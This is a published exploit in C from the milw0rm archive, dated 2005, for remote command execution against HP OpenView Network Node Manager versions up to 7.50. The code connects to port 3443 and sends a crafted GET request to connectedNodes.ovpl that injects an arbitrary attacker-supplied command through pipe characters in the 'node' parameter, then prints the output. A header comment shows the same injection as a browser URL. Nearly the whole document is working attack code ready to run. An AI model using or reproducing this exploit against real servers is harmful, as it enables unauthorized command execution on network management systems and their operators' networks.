HP OpenView Network Node Manager <= 7.50 Remote Exploit

                                                /*
Web Browser info:
	/OvCgi/connectedNodes.ovpl?node=a|command|
	/str0ke
*/

/*
##################################################################################
# HP OpenView Network Node Manager 6.2, 6.4, 7.01, 7.50 Remote Command Execution #
##################################################################################

Name: HP OV NNM Remote Command Execution Exploit
File: HP_OV_NNM_RCE.c
Description: Exploit
Author: Lympex
Contact:
+ Web: http://l-bytes.net
+ Mail: lympex[at]gmail[dot]com
Date: 30/08/2005
Extra: Compiled with Visual C++ 6.0

############################################################################
#SecurityTracker Alert ID:  1014791                                        #
#SecurityTracker URL:  http://securitytracker.com/id?1014791               #
#CVE Reference:  GENERIC-MAP-NOMATCH                                       #
#Updated:  Aug 25 2005                                                     #
#Original Entry Date:  Aug 25 2005                                         #
#Impact:  Execution of arbitrary code via network, User access via network #
############################################################################

*/

//headers
#include <stdio.h>//In/Out
#include <winsock2.h>//sockets functions
#include <stdlib.h>//memory functions
#include <string.h>//strlen,strcat,strcpy

#pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"

#define Port 3443 //port for connect to HP OV NNM
#define SIZE 2048 //buffer size to receive the data

/*connect host:port*/
SOCKET Conecta(char *Host, short puerto)
{
	/*struct for make the socket*/
	WSADATA wsaData;
	SOCKET Winsock;//listener socket
	/*two structures for connect*/
	struct sockaddr_in Winsock_In;
	struct hostent *Ip;

	/*start the socket*/
	WSAStartup(MAKEWORD(2,2), &wsaData);
	/*make*/
	Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

	//check socket status
	if(Winsock==INVALID_SOCKET)
	{
		/*exit*/
		WSACleanup();
		return -1;
	}

	/*complete the struct*/
	Ip=gethostbyname(Host);
	Winsock_In.sin_port=htons(puerto);
	Winsock_In.sin_family=AF_INET;
	Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));

	/*connect*/
	if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
	{
		/*end*/
		WSACleanup();
		return -1;
	}

	return Winsock;
}

/*MASTER FUNCTION*/
int main(int argc, char *argv[])
{
	/*the socket*/
	SOCKET sock;
	/*make the evil buffer to send the request*/
	char evil_request[]="GET /OvCgi/connectedNodes.ovpl?node=a| ";
	char evil_request2[]=" |";
	char *evil;
	/*to receive the data*/
	char buf[SIZE];
	unsigned int i;

	printf("\n +[ HP OV NNM Remote Command Execution ]+ by Lympex");
    printf("\nContact: lympex[at]gmail[dot]com & http://l-bytes.net");
	printf("\n-----------------------------------------------------\n");

	if(argc!=3)//HP_OV_NNM_RCE <host> <command>
	{
		printf("\n[+] Usage: %s <host> <command>",argv[0]);
		printf("\nImportant: Do not include \x22<\x22 and \x22>\x22 chars\n");
		return 0;
	}

	for(i=0;i<strlen(argv[2]);i++)
	{
		if(argv[2][i]=='<' || argv[2][i]=='>')
		{
			printf("\n[!] Error - You have included \x22<\x22 and/or \x22>\x22 chars\n");
			return 1;
		}
	}

	printf("\n[+] Connecting  %s:%d...",argv[1],Port);

	/*start the exploit*/
	sock=Conecta(argv[1],Port);//connect
	if(sock==-1)
	{
		printf("Error\n");
		return 1;
	}

	printf("OK");

	/*make the EVIL request*/
	evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));
	strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n");

	//sends it
	send(sock,evil,strlen(evil),0);

	buf[recv(sock,buf,SIZE,0)]='\0';

	//show the data
	printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);

	WSACleanup();
	LocalFree(buf);
	LocalFree(evil);
	return 0;
}

// milw0rm.com [2005-08-30]